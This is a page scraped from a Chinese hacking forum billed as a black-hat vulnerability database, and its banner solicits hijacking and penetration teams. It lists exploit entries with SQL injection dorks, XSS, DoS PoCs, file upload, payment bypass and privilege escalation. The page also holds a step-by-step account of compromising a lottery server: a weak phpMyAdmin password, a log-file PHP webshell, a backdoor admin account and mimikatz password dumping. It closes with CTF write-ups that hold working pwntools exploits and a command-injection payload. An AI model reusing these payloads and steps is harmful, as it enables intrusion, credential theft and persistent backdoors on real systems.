诚邀seo站长，短信，劫持，渗透，代理，推广团队，博主，主播，各种资源流量大佬合作共赢【站外广告】

黑帽漏洞数据库

记录包含各种WordPress/Windows/PHP/Linux等各种系统漏洞或模板。

粉丝

排序方法

ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting
ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting

发帖人 HACK7YD，2022年11月8日2年前
Multiple,webapps,
################################################################################################################################## # Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.arangodb.com # Software Link: https://www.arangodb.com/download-major/ # Version: 3.4.2-1 ################################################################################################################################## Introduction ArangoDB is a native multi-model, open-source database with flexible data models for documents, graphs, and key-values. Build high performance applications usi…
- 0 篇回复
- 110 次查看
HACK7YD

2022年11月8日2年前
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting

发帖人 HACK7YD，2022年11月8日2年前
Multiple,webapps,
################################################################################################################################## # Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting # Date: 18.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://cdome.comodo.com/firewall/ # Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278 # Version: 2.7.0 ################################################################################################################################## Introduction Comodo Dome Firewall (DFW) provides comprehensive security for enterprise networks. The firewall software…
- 0 篇回复
- 109 次查看
HACK7YD

2022年11月8日2年前
BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)
BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)

发帖人 Tenfk，2022年11月8日2年前
Windows,dos,
#Exploit Title: BulletProof FTP Server 2019.0.0.50 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2018-02-19 #Vendor Homepage: http://bpftpserver.com/ #Software Link: http://bpftpserver.com/products/bpftpserver/windows/download #Tested Version: 2019.0.0.50 #Tested on: Windows 7 x64 Service Pack 1 #Steps to produce the crash: #1.- Run python code: BulletProof_FTP_Server_2019.0.0.50.py #2.- Open bullet.txt and copy content to clipboard #3.- Open BulletProof FTP Server #4.- Select "Settings" > "SMTP" #5.- In "Email Server" select "SMTP Server" and Paste Clipboard #6.- Click on "Test" #7.- Crashed cod = "\x41" * 257 f = open('bullet.txt', 'w'…
- 0 篇回复
- 131 次查看
Tenfk

2022年11月8日2年前
Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection
Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection

发帖人剑道尘心，2022年11月8日2年前
PHP,webapps,
# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection # Google Dork: inurl:"assets/external/data.php" # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://themerig.com/ # Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597 # Demo Website: https://themerig.com/find/ # Version: 1.5 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- Find a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability. # POC: ---------------------- 1. Access the following path ht…
- 0 篇回复
- 132 次查看
剑道尘心

2022年11月8日2年前
WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing
WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing

发帖人 CHQ1d，2022年11月8日2年前
PHP,webapps,CVE-2018-20782
<?php # Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing] # Discovery Date: 14.12.2018 # Public Disclosure Date: 14.02.2019 # Exploit Author: GeekHack # Contact: https://t.me/GeekHack # Vendor Homepage: https://globee.com/ (previously payb.ee) # Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1 # Version: <= 1.1.1 # Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1 # CVE: CVE-2018-20782 /* Description: Reliance on untrusted inputs (CWE-807), insufficient data verification and lack of any…
- 0 篇回复
- 140 次查看
CHQ1d

2022年11月8日2年前
Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload
Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload

发帖人 Anonymous，2022年11月8日2年前
JSP,webapps,CVE-2019-8394
# Exploit Title: Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 - arbitrary file upload # Date: 18-02-2019 # Exploit Author: Dao Duy Hung (duyhungattt@gmail.com) # Vendor Homepage: https://www.manageengine.com/products/service-desk/ # Software Link: https://www.manageengine.com/products/service-desk/download.html?opDownload_indexbnr # Version: 9.4 and 10.0 before 10.0 build 10012 # Tested on: SDP 10.0 build 10000 # CVE : CVE-2019-8394 Detail: In file common/FileAttachment.jsp line 332 only check file upload extension when parameter 'module' equal to 'SSP' or 'DashBoard' or 'HomePage', and if parameter 'module' is set to 'CustomLogin' will skip check fil…
- 0 篇回复
- 124 次查看
Anonymous

2022年11月8日2年前
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process

发帖人 XenoG，2022年11月8日2年前
Java,dos,
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- $ bin/java -cp . DisplaySfntFont test.ttf Iteration (0,0) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007f42e9a30f79, pid=43119, tid=0x00007f431d7fc700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) # Prob…
- 0 篇回复
- 141 次查看
XenoG

2022年11月8日2年前
Apache CouchDB 2.3.0 - Cross-Site Scripting
Apache CouchDB 2.3.0 - Cross-Site Scripting

发帖人 cnhackteam7，2022年11月8日2年前
Multiple,webapps,
################################################################################################################################## # Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://couchdb.apache.org # Software Link: http://couchdb.apache.org/#download # Version: 2.3.0 ################################################################################################################################## Introduction A CouchDB server hosts named databases, which store documents. Each document is uniquely named in the database, and CouchDB provides a RESTful HTTP API for reading and updating (a…
- 0 篇回复
- 123 次查看
cnhackteam7

2022年11月8日2年前
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass

发帖人风尘剑心，2022年11月8日2年前
Java,dos,
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- Iteration (0,0) Iteration (0,1) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007f857116fde3, pid=31542, tid=0x00007f85a5a70700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) # Problematic frame: # C [lib…
- 0 篇回复
- 138 次查看
风尘剑心

2022年11月8日2年前
Listing Hub CMS 1.0 - 'pages.php id' SQL Injection
Listing Hub CMS 1.0 - 'pages.php id' SQL Injection

发帖人剑道尘心，2022年11月8日2年前
PHP,webapps,
# Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection # Google Dork: inurl:"pages.php?title=privacy-policy" # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://themerig.com/ # Software Link: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294 # Demo Website: https://listing-hub.themerig.com # Version: 1.0 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability. # POC: ---------------------- 1. Access the following path https://[PATH]/pages.php?title=pr…
- 0 篇回复
- 138 次查看
剑道尘心

2022年11月8日2年前
Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)
Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)

发帖人 Xiao7，2022年11月8日2年前
Windows,dos,
#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2018-02-19 #Vendor Homepage: https://valentina-db.com/en/ #Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk #Tested Version: 9.0.4 #Tested on: Windows 7 x64 Service Pack 1 #Steps to produce the crash: #1.- Run python code: Valentina_Studio_9.0.4.py #2.- Open valentina.txt and copy content to clipboard #3.- Open Valentina Studio #4.- Select "File" > "Connect to" #5.- Select "Valentina Server" #6.- Select "Host" and Paste Clipboard #7.- Crashed cod = "\x41" * 256 f = open('valentina.txt', 'w') f.write(cod) f.clo…
- 0 篇回复
- 130 次查看
Xiao7

2022年11月8日2年前
eDirectory - SQL Injection
eDirectory - SQL Injection

发帖人尖REN，2022年11月8日2年前
PHP,webapps,
# Exploit Title: Admin auth bypass, SQLi and File Disclosure # Google Dork: no defacers please ! # Date: March 2019 (reported to vendor without response :D) # Exploit Author: Efren Diaz # Author contact: https://twitter.com/elefr3n # Vendor Homepage: https://www.edirectory.com/ # Software Link: not available # Version: All versions # Tested on: Ubuntu 14.04 # CVE : none #DESCRIPTION eDirectory is a software to create your own membership website, business directories, yellow pages, coupon sites, local guide, lead gen sites and more. # SQL Injection Links: - https://site.com/location.php?type=byId&id=[INT]&childLevel=[INT]&level=[SQLi] - https://site.com/…
- 0 篇回复
- 119 次查看
尖REN

2022年11月8日2年前
NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)
NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)

发帖人 KaiWn，2022年11月8日2年前
Windows,dos,
#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2018-02-17 #Vendor Homepage: https://www.netsetman.com/ #Software Link: https://www.netsetman.com/netsetman.exe #Tested Version: 4.7.1 #Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1 #Steps to produce the crash: #1.- Run python code: NetSetMan_4.7.1.py #2.- Open netsetman.txt and copy content to clipboard #3.- Open NetSetMan #4.- Enable "Workgroup" and Paste Clipboard #5.- Click on "Activate" #6.- Crashed cod = "\x41" * 100 f = open('netsetman.txt', 'w') f.write(cod) f.close()
- 0 篇回复
- 125 次查看
KaiWn

2022年11月8日2年前
XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting
XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting

发帖人 Tenfk，2022年11月8日2年前
PHP,webapps,CVE-2019-8924CVE-2019-8923
<!-- # Exploit Title: SQL injection in XAMPP 5.6.8 (and previous) # Date: 17-02-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/ # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/ # Version: XAMPP 5.6.8 # Tested on: All # CVE : CVE-2019-8923 # Category: webapps 1. Description XAMPP through 5.6.8 allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8.2 (and previous). 2. Proof of Concept http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20A…
- 0 篇回复
- 137 次查看
Tenfk

2022年11月8日2年前
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions

发帖人轩辕三官，2022年11月8日2年前
Java,dos,
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: --- cut --- $ bin/java -cp . DisplaySfntFont test.ttf Iteration (0,0) Iteration (0,1) Iteration (0,2) Iteration (0,3) Iteration (0,4) # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007fbaa11694c8, pid=19540, tid=0x00007fbac4f18700 # # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) # Java VM: Java HotSpot(TM) 64-Bi…
- 0 篇回复
- 136 次查看
轩辕三官

2022年11月8日2年前
MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - Local Privilege Escalation
MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - Local Privilege Escalation

发帖人 CHQ1d，2022年11月8日2年前
Windows,local,CVE-2019-15084
# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation # Google Dork: # Date: 2/18/2019 # Exploit Author: Mike Siegel @ml_siegel # Vendor Homepage: https://maxx.com # Software Link: # Version: 1.6.2.0 (May affect other versions) # Tested on: Win 10 64 bit # CVE : CVE-2019-15084 MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations. MaxxAudio drivers version 1.6.2.0 install with incorrect file permissions. As a result a local attacker can escalate to SYSTEM level privileges. Dell PSIRT has acknowledged the issue and advises updating to …
- 0 篇回复
- 141 次查看
CHQ1d

2022年11月8日2年前
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour

发帖人 RenX6，2022年11月8日2年前
Java,dos,
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of OpenType fonts. It manifests itself in the form of the following crash (with AFL's libdislocator): --- cut --- gdb$ c Continuing. Iteration (0,0) Thread 2 "java" received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x6d1a RBX: 0x7fffb5d94f48 --> 0x7fffb6319f00 --> 0x53ab1500ff RCX: 0xffffffffffff0000 RDX: 0x7fff28fbdfe6 --> 0x2a001d00100003 RSI: 0x7fff28fadfe8 --> 0x1e001100040000 [...] [-------…
- 0 篇回复
- 157 次查看
RenX6

2022年11月8日2年前
ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting
ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting

发帖人 cnhackteam7，2022年11月8日2年前
Multiple,webapps,
################################################################################################################################## # Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.arangodb.com # Software Link: https://www.arangodb.com/download-major/ # Version: 3.4.2-1 ################################################################################################################################## Introduction ArangoDB is a native multi-model, open-source database with flexible data models for documents, graphs, and key-values. Build high performance applications usi…
- 0 篇回复
- 143 次查看
cnhackteam7

2022年11月8日2年前
Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting
Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting

发帖人剑道尘心，2022年11月8日2年前
PHP,webapps,
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting # Google Dork: N/A # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://zuz.host/ # Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476 # Version: 2.1 # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability. # POC: ---------------------- 1. Go To https://[PATH]/contact 2. There are three vulnerable parameters name, subject and message. 3. Inject the Jav…
- 0 篇回复
- 135 次查看
剑道尘心

2022年11月8日2年前
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting

发帖人 cnhackteam7，2022年11月8日2年前
Multiple,webapps,
################################################################################################################################## # Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting # Date: 18.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://cdome.comodo.com/firewall/ # Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278 # Version: 2.7.0 ################################################################################################################################## Introduction Comodo Dome Firewall (DFW) provides comprehensive security for enterprise networks. The firewall software…
- 0 篇回复
- 132 次查看
cnhackteam7

2022年11月8日2年前

粉丝

针对 NPM Registry API 的新定时攻击可能会暴露私有包
针对 NPM Registry API 的新定时攻击可能会暴露私有包

游客发布主题帖子在 A Test Forum

Chapter 1 Emergency Response-webshell Check Introduction Target machine account password root xjwebshell 1. The flag flag in the hacker webshell {
- 4月10日4月10日
- 0篇回复
研究人员详细介绍了网络间谍组织 Earth Aughisky 使用的恶意工具
研究人员详细介绍了网络间谍组织 Earth Aughisky 使用的恶意工具

游客发布主题帖子在 A Test Forum

Get phpmyadmin weak password The ip of the lottery site is xxx through information, and the detection scan reveals that phpmyadmin exists. Through guessing, use the default weak password (root/root) to log in to phpmyadmin. Write shell to log file through phpmyadmin background sql query Use phpmyadmin's SQL query function to write a sentence Trojan to the log file. The process and command are as follows : 1. Turn on the log function: set global general_log=on; 2. Click the phpmyadmin variable to view the log file name : The log file here is test.php. 3. Execute SQL command and write a sentence to the log file : SELECT'?php assert($_POST['test']);'; 4. Return after successful execution. 5. View log files. 6. Add the user by connecting the kitchen knife and upload mimikatz. Use kitchen knife to connect to log file Trojan, xxx/test.php password :test Check and find that it is the system administrator system permission, just add the user and add it to the management group. The command is : C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add Upload mimikataz to the server. 7. 3389 connection and read the administrator password. (1) Direct telnet ip 3389 test found that it is accessible, so I directly connected 3389 to enter. (2) Or the following command is executed on the kitchen knife here to query the port open by 3389. Step 1 : tasklist /svc | findstr TermService query the process of remote desktop service Step 2 : netstat -ano | findstr **** //Check the port number corresponding to the remote desktop service process number. (3) Execute mimikatz and read the administrator group login password. (4) Use the obtained administrator/xxxx account password to log in to the server remotely. It was found that the server used phpmystudy to build a lottery station in batches. There were about a dozen sites, and they could access the website domain names on several servers at will. Some screenshots are as follows : System 1 : System 2 : System : Backstage 1 : Backstage 2 : Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247487003idx=1sn=5c85b34ce6ffb400fdf858737e34df3dchksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddcscene=21#wechat_redirect https://blog.csdn.net/weixin_39997829/article/details/109186917
- 4月10日4月10日
- 0篇回复
新报告揭示了 Emotet 在近期攻击中使用的传递和规避技术
新报告揭示了 Emotet 在近期攻击中使用的传递和规避技术

游客发布主题帖子在 A Test Forum

Preliminary Competition web_ezcms swagger leaked test/test test account login, /sys/user/** has not done authentication, you can add a super administrator user, roleId is still unknown at this time. And the role module is not unauthorized. Continue reading the user module and discover the interface There is a roleid leak here, fill in the idfcf34b56-a7a2-4719-9236-867495e74c31 of the admin leaked earlier here GET/sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31 At this time, I know that the super administrator id is 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9, add the user { 'createWhere':0, 'deptId':'1', 'email':'', 'password':'123456', 'phone':'11111111111', 'roleIds':[ '11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9' ], 'sex':'fmale', 'username':'hacker' } Password field decoding failed, then check the log with the test account and found the key of aes: AbCdEfGhIjKlMnOp, and then the user was added successfully. After we added the user, we found the ping function in the module, but there is waf. Bypass waf and execute the command to get flag POST/sys/pingHTTP/1.1 Host: User-Agent:Mozilla/5.0 (Macintosh; IntelMacOSX10.15; rv:126.0)Gecko/20100101Firefox/126.0 Accept:application/json,text/javascript,*/*;q=0.01 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate Content-Type:application/json;charset=UTF-8 authorization:eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJmY2YzNGI1Ni1hN2EyLTQ3MTktOTIzNi04Njc0OTVlNzRjMzEiLCJqd3Qtcm9sZXMta2V5XyI6WyLotoXnuqfnrqHnkIblkZgiXSwiaXNzIjoieWluZ3h1ZS5jb20iLCJqd3QtcGVybWlzc2lvbnMta2V5IjpbInN5czp1c2VyOmxpc3QiLCJzeXM 6ZGVwdDp1cGRhdGUiLCJzeXM6ZGVwdDpkZXRhaWwiLCJzeXM6dXNlcjpyb2xlOnVwZGF0ZSIsInN5czpwZXJtaXNzaW9uOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmRlbGV0ZWQiLCJzeXM6cGVybWlzc2lvbjp1cGRhdGUiLCJzeXM6dXNlcjpkZXRhaWwiLCJzeXM6ZGVwdDpkZWxldGVkIiwic3lzOn JvbGU6dXBkYXRlIiwic3lzOnJvbGU6ZGV0YWlsIiwic3lzOmRlcHQ6bGlzdCIsInN5czpkZXB0OmFkZCIsInN5czp1c2VyOnVwZGF0ZSIsInN5czpyb2xlOmxpc3QiLCJzeXM6cm9sZTpkZWxldGVkIiwic3lzOnBlcm1pc3Npb246bGlzdCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uO mRlbGV0ZWQiLCJzeXM6bG9nOmRlbGV0ZWQiLCJzeXM6dXNlcjpyb2xlOmRldGFpbCIsInN5czpyb2xlOmFkZCIsInN5czpsb2c6bGlzdCJdLCJqd3QtdXNlci1uYW1lLWtleSI6ImFkbWluIiwiZXhwIjoxNzE2NzE3MjIwLCJpYXQiOjE3MTY3MTAwMjB9.9wcw8M2Ky0lFTbD2B7YaAmPKTl_EO0kJCB5J3bw8FkA X-Requested-With:XMLHttpRequest Content-Length:28 Origin: DNT:1 Sec-GPC:1 Connection:close Referer: Cookie:JSESSIONID=C701D746DA63E8FB94270AD6D2FD9ADB Sec-Fetch-Dest:empty Sec-Fetch-Mode:cors Sec-Fetch-Site:same-origin Priority:u=1 {'ip':'10.10.10.10-1||cat/flag'} Top Secret File-Code P importcv2 importnumpyasnp s=179093209181929149953346613617854206675976823277412565868079070299728290913658 fromCrypto.Util.numberimport* #p,q=(241627603783727624224706687817893681267, #347432454257893250496407965506777649463) ##assertp**2+q**2==s ##print(isPrime(p),isPrime(q)) #Img_path='flag_enc.png' #Img=cv2.imread(Img_path) #print(Img.shape) fromympy.solvers.diophantine.diophantineimportcornacchia ''' This place needs to be modified, decomposed from s, and just factordb f={7247215681561944590028089613581484765881:1,157606014243244438240601:1,5801674693:1,2:1,13513:1} ''' x1=cornacchia(1,1,s) fora,binx1: asserta**2+b**2==s ifisPrime(a)andisPrime(b): print(a,b) #I got p and q here fromCrypto.Util.numberimport* p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957 s=179093209181929149953346613617854206675976823277412565868079070299728290913658 assertisPrime(p)andisPrime(q)andp**2+q**2==s importcv2 path1='flag_enc.png' img=cv2.imread(path1) #print(img.shape) r,c,d=img.shape print(r,c) #i,j=101,201 fromtqdmimporttqdm a,b=p,q foriintqdm(range(r)): forjinrange(c): set1=set() set1.add((i,j)) i1,j1=i,j whileTrue: x=(i1+b*j1)%r y=((a*i1)+(a*b+1)*j1)%c i1,j1=x,y if(x,y)notinset1: set1.add((x,y)) else: ifi==0andj==0: Continue continue assertlen(set1)==190# are all default 190 #We found that it was 190 here. It was a coincidence that we just started to touch it later. #s1=s%190 #print(s1) #importnumpyasnp #defarnold(img,shuffle_times,a,b): #r,c,d=img.shape #p=np.zeros(img.shape,np.uint8) #print(r,c,d,shuffle_times) #forsinrange(shuffle_times): #foriinrange(r): #forjinrange(c): #x=(i+b*j)%r #y=((a*i)+(a*b+1)*j)%c #p[x,y,]=img[i,j,] #img=np.copy(p) #returnp #x1=arnold(img,11,p,q) #cv2.imwrite('flag3.png',x1) ##cv2.imwrite('flag1.png',img) # c=179093209181929149953346613617854206675976823277412565868079070299728290913658 p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957 importcv2 importnumpyasnp defarnold(img,shuffle_times,a,b): r,c,d=img.shape p=np.zeros(img.shape,np.uint8) print(r,c,d,shuffle_times) forsinrange(shuffle_times): foriinrange(r): forjinrange(c): x=(i+b*j)%r y=((a*i)+(a*b+1)*j)%c p[x,y,]=img[i,j,] img=np.copy(p) return img=cv2.imread('flag_enc.png') #print(img) c1=c%190 foriinrange(190): img=arnold(img,1,p,q) cv2.imwrite(f'flag{i+1}.png',img) ''' 1. Just enumerate violently. Anyway, the cycle is 190, just enumerate it all. When you find i=66, flag67.png is flag 2.flag{Ailuropoda_rnelanoleuca} ''' Persist in doing the right thing The data retrieved from the traffic packet is a hexadecimal system of an image Check his hexadecimal system and find that there is an additional data at the end of him It is a vim drawing command, install DrawIt directly, enter the command to draw the map GAME Play the game directly and get flag This is a real sign-in FunIoT gives a set of docker files, run a binary file on it, open the reverse directly, then combine dynamic debugging and static analysis to analyze the protocol format, and finally use one of the functions of reading files, and use //bypass comparison detection: Then read the flag: frommpwnimport* importzlib #p=remote('127.0.0.1',6768) p=remote('173.34.20.10',6768) header=b'FunIoT'#6 cmd=0x102 cmd_encode=int(cmd).to_bytes(2,'big') len=0x0101 length=int(len).to_bytes(2,'big') #content=b'getInfo:shadow' #content=b'getInfo:/lib/udev/rc_keymaps/asus_pc39.toml' content=b'getInfo://flag' content=content.ljust(0x101,b'\x00') check_sum=int(zlib.crc32(content)).to_bytes(4,'big') full_content=header+length+cmd_encode+check_sum+content #packet: #header:6bytes #length:2bytes #cmd:2bytes #checksum:4bytes #content:unknow context.log_level='debug' p.send(full_content) #p.interactive() importbase64 print(base64.b64decode(p.recv()).decode('utf-8')) #command:getInfo,setInfo,secret guess_hack The question requires inputting a maximum value and a minimum value, and then guessing the random number in this range. If you guess correctly, you will enter a stack overflow. The number of overflow characters is the number of times you guessed wrong, so you can enter two adjacent numbers, and then guess mistakes enough times, and then perform regular stack overflow utilization. Because the stack can be executed, and the detection requires that the payload is not empty, I directly wrote shellcode and performed a little XOR bypassed non-empty detection: #random%(max-min+1)+min frommpwnimport* context.log_level='debug' #p=process('./main') p=remote('173.34.20.233',9999) p.sendlineafter(b'ch:',b'1') p.sendlineafter(b'Enteraminimumandmaximumnumberfortheguessinggame:',b'12') foriinrange(99): p.sendlineafter(b'Guessanumber',b'1') p.sendlineafter(b'Guessanumberbetween',b'2') payload=b'a'*0x3c payload+=p32(0x0805dea9) payload+=asm(''' push0xffffffff4 popeax push0xffffffffffff popepx xoreax,ebx push0xff978cd0 popecx xorecx,ebx pushecx push0x6e69622f movebx,esp xorecx,ecx int0x80''') payload=payload.ljust(99,b'a') pause() p.sendlineafter(b'Congratulations!',payload) p.interactive() msg The stack overflow + format string vulnerability in the dictionary in the dictionary, which exploits the format string vulnerability to leak to canary and libc, and then the overflow return address is one gadget: frommpwnimport* #p=process('./main') p=remote('173.34.20.68',9999) p.sendlineafter(b'message:',b'%11$p') canary=int(p.recv(18),16) success(f'canary:{hex(canary)}') p.sendlineafter(b'message:',b'%3$p') libc=int(p.recv(14),16)-0x10e1f2 success(f'libc:{hex(libc)}') one=libc+0xe3b01 p.sendlineafter(b'message:',b'a'*0x28+p64(canary)+b'b'*8+p64(one)) pause() p.sendlineafter(b'message:',b'\x00'*0x10) p.interactive() stackover is also a classic stack overflow, but remote libc is a bit different from local. In addition, the return address is returned through leaf esp, [ecx-4], ret, which has not been successfully used. However, after controlling the program to various output places, it is determined that the stack environment is basically the same, so in the end, try not to rely on libc to utilize: frommpwnimport* #context.log_level='debug' #p=process('./stackover') p=remote(b'173.34.20.46',9999) p.sendafter(b'read:',b'a'*0x29b) p.recvuntil(b'a'*0x29b) canary=u32(b'\x00'+p.recv(3)) success(f'canary:{hex(canary)}') #pause() p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c-0x30-4)) p.recvuntil(b'a'*(0x29b+7+8+0x2c-0x30-4)) p.recv(4) p.recv(4) stack=u32(p.recv(4)) success(f'stack:{hex(stack)}') #pause() p.sendafter(b'read:',b'b'*(0x29b+0x18+7)) p.recvuntil(b'b'*(0x29b+0x18+7)) libc=u32(p.recv(4))-0x1aed5 success(f'libc:{hex(libc)}') #pause() p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c+0x54)) p.recvuntil(b'a'*(0x29b+7+8+0x2c+0x54)) elf_base=u32(p.recv(4))-0x3fb8 success(f'elf_base:{hex(elf_base)}') payload=b'c'*(0x29a-0x14-8) #execve0xc9510 #system0x41780 #puts0x6dc40 #payload+=p32(libc+0x6dc40) 